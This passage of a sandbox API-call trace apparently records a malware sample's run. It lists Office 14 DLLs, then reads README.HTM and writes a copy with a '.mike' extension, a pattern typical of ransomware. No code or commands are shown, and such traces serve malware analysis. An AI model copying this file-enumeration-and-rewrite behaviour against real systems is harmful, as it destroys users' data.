ftCreationTime.dwLowDateTime=0x1570ec00, ftCreationTime.dwHighDateTime=0x1cbc479, ftLastAccessTime.dwLowDateTime=0xe5d21520, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x1570ec00, ftLastWriteTime.dwHighDateTime=0x1cbc479, nFileSizeHigh=0x0, nFileSizeLow=0xb7ba8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PJ11OD11.DLL", cAlternateFileName="")) returned 1 [0046.593] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a461000, ftCreationTime.dwHighDateTime=0x1cb7018, ftLastAccessTime.dwLowDateTime=0xe5d47680, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x9a461000, ftLastWriteTime.dwHighDateTime=0x1cb7018, nFileSizeHigh=0x0, nFileSizeLow=0x3fb90, dwReserved0=0x0, dwReserved1=0x0, cFileName="PJRESC.DLL", cAlternateFileName="")) returned 1 [0046.593] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74bd800, ftCreationTime.dwHighDateTime=0x1cb71c8, ftLastAccessTime.dwLowDateTime=0xe5d93940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x74bd800, ftLastWriteTime.dwHighDateTime=0x1cb71c8, nFileSizeHigh=0x0, nFileSizeLow=0x3c2b90, dwReserved0=0x0, dwReserved1=0x0, cFileName="PRJRES.DLL", cAlternateFileName="")) returned 1 [0046.593] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a199a00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xdac16060, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a199a00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0x1c8b68, dwReserved0=0x0, dwReserved1=0x0, cFileName="RICHED20.DLL", cAlternateFileName="")) returned 1 [0046.593] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7339ac00, ftCreationTime.dwHighDateTime=0x1cbdfc2, ftLastAccessTime.dwLowDateTime=0xe5d93940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x7339ac00, ftLastWriteTime.dwHighDateTime=0x1cbdfc2, nFileSizeHigh=0x0, nFileSizeLow=0x90778, dwReserved0=0x0, dwReserved1=0x0, cFileName="SERCONV.DLL", cAlternateFileName="")) returned 1 [0046.593] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xded68100, ftCreationTime.dwHighDateTime=0x1cb5970, ftLastAccessTime.dwLowDateTime=0xd68d72e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xded68100, ftLastWriteTime.dwHighDateTime=0x1cb5970, nFileSizeHigh=0x0, nFileSizeLow=0xc6b00, dwReserved0=0x0, dwReserved1=0x0, cFileName="USP10.DLL", cAlternateFileName="")) returned 1 [0046.593] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x520efa00, ftCreationTime.dwHighDateTime=0x1cbc41d, ftLastAccessTime.dwLowDateTime=0xd83064e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x520efa00, ftLastWriteTime.dwHighDateTime=0x1cbc41d, nFileSizeHigh=0x0, nFileSizeLow=0xc150, dwReserved0=0x0, dwReserved1=0x0, cFileName="VBAJET32.DLL", cAlternateFileName="")) returned 1 [0046.593] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14a84d00, ftCreationTime.dwHighDateTime=0x1caa6a1, ftLastAccessTime.dwLowDateTime=0x5e5e73d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x14a84d00, ftLastWriteTime.dwHighDateTime=0x1caa6a1, nFileSizeHigh=0x0, nFileSizeLow=0x23f90, dwReserved0=0x0, dwReserved1=0x0, cFileName="WISC30.DLL", cAlternateFileName="")) returned 1 [0046.593] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.595] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe5d93940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5d93940, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.595] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc24d0020, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc24d0020, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0046.595] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x703dbc00, ftCreationTime.dwHighDateTime=0x1cbdfc0, ftLastAccessTime.dwLowDateTime=0xd80a4ee0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x703dbc00, ftLastWriteTime.dwHighDateTime=0x1cbdfc0, nFileSizeHigh=0x0, nFileSizeLow=0x310788, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACECORE.DLL", cAlternateFileName="")) returned 1 [0046.595] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3706ca00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd80f11a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3706ca00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0xb5db8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEDAO.DLL", cAlternateFileName="")) returned 1 [0046.595] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81925f00, ftCreationTime.dwHighDateTime=0x1caca23, ftLastAccessTime.dwLowDateTime=0x51128590, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x81925f00, ftLastWriteTime.dwHighDateTime=0x1caca23, nFileSizeHigh=0x0, nFileSizeLow=0xa990, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEERR.DLL", cAlternateFileName="")) returned 1 [0046.595] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3706ca00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd8117300, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3706ca00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0xf73a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEES.DLL", cAlternateFileName="")) returned 1 [0046.596] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3706ca00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd8117300, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3706ca00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0x6bfa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEEXCH.DLL", cAlternateFileName="")) returned 1 [0046.596] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3706ca00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd813d460, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3706ca00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0xdbb98, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEEXCL.DLL", cAlternateFileName="")) returned 1 [0046.596] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95c9c200, ftCreationTime.dwHighDateTime=0x1cba070, ftLastAccessTime.dwLowDateTime=0xd813d460, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x95c9c200, ftLastWriteTime.dwHighDateTime=0x1cba070, nFileSizeHigh=0x0, nFileSizeLow=0x53bb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEODBC.DLL", cAlternateFileName="")) returned 1 [0046.596] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77357e00, ftCreationTime.dwHighDateTime=0x1cac9ad, ftLastAccessTime.dwLowDateTime=0x51128590, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77357e00, ftLastWriteTime.dwHighDateTime=0x1cac9ad, nFileSizeHigh=0x0, nFileSizeLow=0x3db8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEODDBS.DLL", cAlternateFileName="")) returned 1 [0046.596] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77357e00, ftCreationTime.dwHighDateTime=0x1cac9ad, ftLastAccessTime.dwLowDateTime=0x5e99f630, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77357e00, ftLastWriteTime.dwHighDateTime=0x1cac9ad, nFileSizeHigh=0x0, nFileSizeLow=0x3db8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEODEXL.DLL", cAlternateFileName="")) returned 1 [0046.596] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77357e00, ftCreationTime.dwHighDateTime=0x1cac9ad, ftLastAccessTime.dwLowDateTime=0x5e99f630, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77357e00, ftLastWriteTime.dwHighDateTime=0x1cac9ad, nFileSizeHigh=0x0, nFileSizeLow=0x3db8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEODTXT.DLL", cAlternateFileName="")) returned 1 [0046.596] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3706ca00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd8189720, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3706ca00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0x833a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEOLEDB.DLL", cAlternateFileName="")) returned 1 [0046.596] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96faef00, ftCreationTime.dwHighDateTime=0x1cba070, ftLastAccessTime.dwLowDateTime=0xd8247e00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x96faef00, ftLastWriteTime.dwHighDateTime=0x1cba070, nFileSizeHigh=0x0, nFileSizeLow=0x6e398, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACER3X.DLL", cAlternateFileName="")) returned 1 [0046.596] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95c9c200, ftCreationTime.dwHighDateTime=0x1cba070, ftLastAccessTime.dwLowDateTime=0xd826df60, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x95c9c200, ftLastWriteTime.dwHighDateTime=0x1cba070, nFileSizeHigh=0x0, nFileSizeLow=0xd9c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACERCLR.DLL", cAlternateFileName="")) returned 1 [0046.596] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35d59d00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd826df60, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x35d59d00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0xa8da0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEREP.DLL", cAlternateFileName="")) returned 1 [0046.596] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35d59d00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd82940c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x35d59d00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0x48990, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACETXT.DLL", cAlternateFileName="")) returned 1 [0046.597] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1092c00, ftCreationTime.dwHighDateTime=0x1cb71c7, ftLastAccessTime.dwLowDateTime=0xd82ba220, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1092c00, ftLastWriteTime.dwHighDateTime=0x1cb71c7, nFileSizeHigh=0x0, nFileSizeLow=0x2e8da0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEWDAT.DLL", cAlternateFileName="")) returned 1 [0046.597] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e0c9f00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xcf0c7d40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x8e0c9f00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0x4dba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEWSS.DLL", cAlternateFileName="")) returned 1 [0046.597] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35d59d00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd82e0380, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x35d59d00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0x7a998, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEXBE.DLL", cAlternateFileName="")) returned 1 [0046.597] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67c38700, ftCreationTime.dwHighDateTime=0x1cbc9fc, ftLastAccessTime.dwLowDateTime=0xe5d21520, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x67c38700, ftLastWriteTime.dwHighDateTime=0x1cbc9fc, nFileSizeHigh=0x0, nFileSizeLow=0x5e158, dwReserved0=0x0, dwReserved1=0x0, cFileName="ATLCONV.DLL", cAlternateFileName="")) returned 1 [0046.597] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb10f7500, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0xda5b0540, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xb10f7500, ftLastWriteTime.dwHighDateTime=0x1cbe56c, nFileSizeHigh=0x0, nFileSizeLow=0x4d67b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Csi.dll", cAlternateFileName="")) returned 1 [0046.597] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef87d800, ftCreationTime.dwHighDateTime=0x1cb8cce, ftLastAccessTime.dwLowDateTime=0xda5d66a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xef87d800, ftLastWriteTime.dwHighDateTime=0x1cb8cce, nFileSizeHigh=0x0, nFileSizeLow=0x1b3980, dwReserved0=0x0, dwReserved1=0x0, cFileName="CsiSoap.dll", cAlternateFileName="")) returned 1 [0046.597] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xceefecc0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xceefecc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xceefecc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cultures", cAlternateFileName="")) returned 1 [0046.597] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x520efa00, ftCreationTime.dwHighDateTime=0x1cbc41d, ftLastAccessTime.dwLowDateTime=0xd83064e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x520efa00, ftLastWriteTime.dwHighDateTime=0x1cbc41d, nFileSizeHigh=0x0, nFileSizeLow=0x7eb48, dwReserved0=0x0, dwReserved1=0x0, cFileName="EXPSRV.DLL", cAlternateFileName="")) returned 1 [0046.597] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ebd7300, ftCreationTime.dwHighDateTime=0x1cba5c3, ftLastAccessTime.dwLowDateTime=0xcef710e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3ebd7300, ftLastWriteTime.dwHighDateTime=0x1cba5c3, nFileSizeHigh=0x0, nFileSizeLow=0x21d78, dwReserved0=0x0, dwReserved1=0x0, cFileName="EXP_PDF.DLL", cAlternateFileName="")) returned 1 [0046.597] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5bf6900, ftCreationTime.dwHighDateTime=0x1cba06e, ftLastAccessTime.dwLowDateTime=0xcf5b0aa0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xf5bf6900, ftLastWriteTime.dwHighDateTime=0x1cba06e, nFileSizeHigh=0x0, nFileSizeLow=0x11578, dwReserved0=0x0, dwReserved1=0x0, cFileName="EXP_XPS.DLL", cAlternateFileName="")) returned 1 [0046.597] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd66e7600, ftCreationTime.dwHighDateTime=0x1cb7002, ftLastAccessTime.dwLowDateTime=0xe572de20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xd66e7600, ftLastWriteTime.dwHighDateTime=0x1cb7002, nFileSizeHigh=0x0, nFileSizeLow=0x26560, dwReserved0=0x0, dwReserved1=0x0, cFileName="FLTLDR.EXE", cAlternateFileName="")) returned 1 [0046.598] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7bf3f00, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0x53907610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf7bf3f00, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0x417360, dwReserved0=0x0, dwReserved1=0x0, cFileName="IACOM2.DLL", cAlternateFileName="")) returned 1 [0046.598] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe164800, ftCreationTime.dwHighDateTime=0x1cac048, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe164800, ftLastWriteTime.dwHighDateTime=0x1cac048, nFileSizeHigh=0x0, nFileSizeLow=0x31d88, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICLUA.EXE", cAlternateFileName="")) returned 1 [0046.598] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc821f600, ftCreationTime.dwHighDateTime=0x1cbdfb3, ftLastAccessTime.dwLowDateTime=0xd776b9a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc821f600, ftLastWriteTime.dwHighDateTime=0x1cbdfb3, nFileSizeHigh=0x0, nFileSizeLow=0x183d780, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSO.DLL", cAlternateFileName="")) returned 1 [0046.598] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.598] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.598] CoTaskMemFree (pv=0x4fe370) [0046.600] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.785] GetFileType (hFile=0x264) returned 0x1 [0046.786] GetFileType (hFile=0x264) returned 0x1 [0046.786] CloseHandle (hObject=0x264) returned 1 [0046.786] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0046.786] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.787] GetFileType (hFile=0x264) returned 0x1 [0046.787] GetFileType (hFile=0x264) returned 0x1 [0046.787] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0046.788] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.788] GetFileType (hFile=0x264) returned 0x1 [0046.788] GetFileType (hFile=0x264) returned 0x1 [0046.788] ReadFile (in: hFile=0x264, lpBuffer=0x22076b4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22076b4*, lpNumberOfBytesRead=0x2af080*=0x795, lpOverlapped=0x0) returned 1 [0046.790] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.790] GetFileType (hFile=0x264) returned 0x1 [0046.790] GetFileType (hFile=0x264) returned 0x1 [0046.790] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0046.790] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.790] GetFileType (hFile=0x264) returned 0x1 [0046.790] GetFileType (hFile=0x264) returned 0x1 [0046.791] WriteFile (in: hFile=0x264, lpBuffer=0x221052c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x221052c*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0046.791] CloseHandle (hObject=0x264) returned 1 [0046.792] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM", lpFilePart=0x0) returned 0x47 [0046.793] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: 